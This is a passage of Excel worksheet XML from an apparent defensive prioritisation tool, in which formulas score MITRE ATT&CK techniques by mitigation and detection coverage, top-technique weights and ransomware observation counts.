      <c r="P495" s="51">
        <v>0</v>
      </c>
      <c r="Q495" s="51">
        <v>0</v>
      </c>
      <c r="R495" s="51"/>
      <c r="S495" s="51">
        <v>0</v>
      </c>
      <c r="T495" s="52" t="s">
        <v>1782</v>
      </c>
      <c r="U495" s="51">
        <v>0</v>
      </c>
      <c r="V495" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W495">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X495">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y495">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z495">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA495">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB495">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC495" s="29" t="s">
        <v>1520</v>
      </c>
      <c r="AD495" s="25" t="str" cm="1">
        <f t="array" ref="AD495">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC495)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE495" s="25">
        <f>IF(AD495="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF495" s="25" t="str" cm="1">
        <f t="array" ref="AF495">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC495)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG495" s="25">
        <f>IF(AF495="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH495" s="25" t="str" cm="1">
        <f t="array" ref="AH495">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC495)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI495" s="25">
        <f>IF(AH495="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ495" s="25" t="str" cm="1">
        <f t="array" ref="AJ495">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC495)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK495" s="25">
        <f>IF(AJ495="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL495" s="25" t="str" cm="1">
        <f t="array" ref="AL495">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC495)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM495" s="25">
        <f>IF(AL495="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN495" s="51"/>
      <c r="AO495" s="51"/>
      <c r="AP495" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.3300000000000001E-2</v>
      </c>
      <c r="AQ495" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AR495" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.4333333333333336E-2</v>
      </c>
      <c r="AS495" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT495" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU49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96" spans="1:47" ht="32.1">
      <c r="A496" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="B496" s="25">
        <f>SUM(H496,M496,V496)*(1+SUM(AE496,AG496,AI496,AK496,AM496))</f>
        <v>0.11320000000000002</v>
      </c>
      <c r="C496" s="25" t="s">
        <v>1783</v>
      </c>
      <c r="D496" s="25" t="s">
        <v>271</v>
      </c>
      <c r="E496" s="25" t="s">
        <v>1784</v>
      </c>
      <c r="F496" s="51">
        <v>1</v>
      </c>
      <c r="G496" s="51">
        <v>1</v>
      </c>
      <c r="H496" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I496">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J496">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K496">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L496">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M496" s="25">
        <v>0</v>
      </c>
      <c r="N496" s="51">
        <v>0</v>
      </c>
      <c r="O496" s="51">
        <v>0</v>
      </c>
      <c r="P496" s="51">
        <v>0</v>
      </c>
      <c r="Q496" s="51">
        <v>0</v>
      </c>
      <c r="R496" s="51"/>
      <c r="S496" s="51">
        <v>0</v>
      </c>
      <c r="T496" s="52" t="s">
        <v>319</v>
      </c>
      <c r="U496" s="51">
        <v>0</v>
      </c>
      <c r="V496" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W496">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X496">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y496">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z496">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA496">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB496">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC496" s="29" t="s">
        <v>1785</v>
      </c>
      <c r="AD496" s="25" t="str" cm="1">
        <f t="array" ref="AD496">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC496)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE496" s="25">
        <f>IF(AD496="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF496" s="25" t="str" cm="1">
        <f t="array" ref="AF496">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC496)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG496" s="25">
        <f>IF(AF496="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH496" s="25" t="str" cm="1">
        <f t="array" ref="AH496">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC496)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI496" s="25">
        <f>IF(AH496="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ496" s="25" t="str" cm="1">
        <f t="array" ref="AJ496">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC496)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK496" s="25">
        <f>IF(AJ496="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL496" s="25" t="str" cm="1">
        <f t="array" ref="AL496">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC496)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM496" s="25">
        <f>IF(AL496="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN496" s="51"/>
      <c r="AO496" s="51"/>
      <c r="AP496" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="AQ496" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AR496" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AS496" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT496" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU49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97" spans="1:47">
      <c r="A497" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="B497" s="25">
        <f>SUM(H497,M497,V497)*(1+SUM(AE497,AG497,AI497,AK497,AM497))</f>
        <v>0.11320000000000002</v>
      </c>
      <c r="C497" s="25" t="s">
        <v>1786</v>
      </c>
      <c r="D497" s="25" t="s">
        <v>271</v>
      </c>
      <c r="E497" s="25" t="s">
        <v>1787</v>
      </c>
      <c r="F497" s="51">
        <v>1</v>
      </c>
      <c r="G497" s="51">
        <v>1</v>
      </c>
      <c r="H497" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I497">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J497">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K497">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L497">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M497" s="25">
        <v>0</v>
      </c>
      <c r="N497" s="51">
        <v>0</v>
      </c>
      <c r="O497" s="51">
        <v>0</v>
      </c>
      <c r="P497" s="51">
        <v>0</v>
      </c>
      <c r="Q497" s="51">
        <v>0</v>
      </c>
      <c r="R497" s="51"/>
      <c r="S497" s="51">
        <v>0</v>
      </c>
      <c r="T497" s="52" t="s">
        <v>1788</v>
      </c>
      <c r="U497" s="51">
        <v>0</v>
      </c>
      <c r="V497" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W497">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X497">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y497">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z497">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA497">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB497">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC497" s="29" t="s">
        <v>1469</v>
      </c>
      <c r="AD497" s="25" t="str" cm="1">
        <f t="array" ref="AD497">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC497)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE497" s="25">
        <f>IF(AD497="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF497" s="25" t="str" cm="1">
        <f t="array" ref="AF497">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC497)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG497" s="25">
        <f>IF(AF497="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH497" s="25" t="str" cm="1">
        <f t="array" ref="AH497">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC497)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI497" s="25">
        <f>IF(AH497="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ497" s="25" t="str" cm="1">
        <f t="array" ref="AJ497">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC497)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK497" s="25">
        <f>IF(AJ497="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL497" s="25" t="str" cm="1">
        <f t="array" ref="AL497">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC497)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM497" s="25">
        <f>IF(AL497="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN497" s="51"/>
      <c r="AO497" s="51"/>
      <c r="AP497" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="AQ497" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AR497" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AS497" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT497" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU49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98" spans="1:47">
      <c r="A498" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="B498" s="25">
        <f>SUM(H498,M498,V498)*(1+SUM(AE498,AG498,AI498,AK498,AM498))</f>
        <v>0.11320000000000002</v>
      </c>
      <c r="C498" s="25" t="s">
        <v>1789</v>
      </c>
      <c r="D498" s="25" t="s">
        <v>215</v>
      </c>
      <c r="E498" s="25" t="s">
        <v>1790</v>
      </c>
      <c r="F498" s="51">
        <v>1</v>
      </c>
      <c r="G498" s="51">
        <v>1</v>
      </c>
      <c r="H498" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I498">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J498">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K498">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L498">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M498" s="25">
        <v>0</v>
      </c>
      <c r="N498" s="51">
        <v>0</v>
      </c>
      <c r="O498" s="51">
        <v>0</v>
      </c>
      <c r="P498" s="51">
        <v>0</v>
      </c>
      <c r="Q498" s="51">
        <v>0</v>
      </c>
      <c r="R498" s="51"/>
      <c r="S498" s="51">
        <v>0</v>
      </c>
      <c r="T498" s="52" t="s">
        <v>1791</v>
      </c>
      <c r="U498" s="51">
        <v>0</v>
      </c>
      <c r="V498" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W498">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X498">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y498">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z498">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA498">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB498">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC498" s="29" t="s">
        <v>1792</v>
      </c>
      <c r="AD498" s="25" t="str" cm="1">
        <f t="array" ref="AD498">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC498)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE498" s="25">
        <f>IF(AD498="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF498" s="25" t="str" cm="1">
        <f t="array" ref="AF498">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC498)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG498" s="25">
        <f>IF(AF498="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH498" s="25" t="str" cm="1">
        <f t="array" ref="AH498">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC498)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI498" s="25">
        <f>IF(AH498="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ498" s="25" t="str" cm="1">
        <f t="array" ref="AJ498">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC498)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK498" s="25">
        <f>IF(AJ498="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL498" s="25" t="str" cm="1">
        <f t="array" ref="AL498">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC498)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM498" s="25">
        <f>IF(AL498="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN498" s="51"/>
      <c r="AO498" s="51"/>
      <c r="AP498" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="AQ498" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AR498" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>3.7733333333333341E-2</v>
      </c>
      <c r="AS498" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT498" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU49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499" spans="1:47">
      <c r="A499" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.1320000000000002E-2</v>
      </c>
      <c r="B499" s="25">
        <f>SUM(H499,M499,V499)*(1+SUM(AE499,AG499,AI499,AK499,AM499))</f>
        <v>0.11320000000000002</v>
      </c>
      <c r="C499" s="25" t="s">
        <v>1793</v>
      </c>
      <c r="D499" s="25" t="s">
        <v>215</v>
      </c>
      <c r="E499" s="25" t="s">
        <v>1794</v>
      </c>
      <c r="F499" s="51">
        <v>1</v>
      </c>
      <c r="G499" s="51">
        <v>1</v>
      </c>
      <c r="H499" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I499">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J499">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K499">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L499">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M499" s="25">
        <v>0</v>
      </c>
      <c r="N499" s="51">
        <v>0</v>
      </c>
      <c r="O499" s="51">
        <v>0</v>
      </c>
      <c r="P499" s="51">
        <v>0</v>
      </c>
      <c r="Q499" s="51">
        <v>0</v>
      </c>
      <c r="R499" s="51"/>
      <c r="S499" s="51">
        <v>0</v>
      </c>
      <c r="T499" s="52" t="s">
        <v>1795</v>
      </c>
      <c r="U499" s="51">
        <v>0</v>
      </c>
      <c r="V499" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W499">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X499">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y499">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z499">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA499">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB499">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC499" s="29" t="s">
        <v>693</v>
      </c>
      <c r="AD499" s="25" t="str" cm="1">
        <f t="array" ref="AD499">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC499)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE499" s="25">
        <f>IF(AD499="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF499" s="25" t="str" cm="1">
        <f t="array" ref="AF499">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC499)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG499" s="25">
        <f>IF(AF499="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH499" s="25" t="str" cm="1">
        <f t="array" ref="AH499">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC499)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
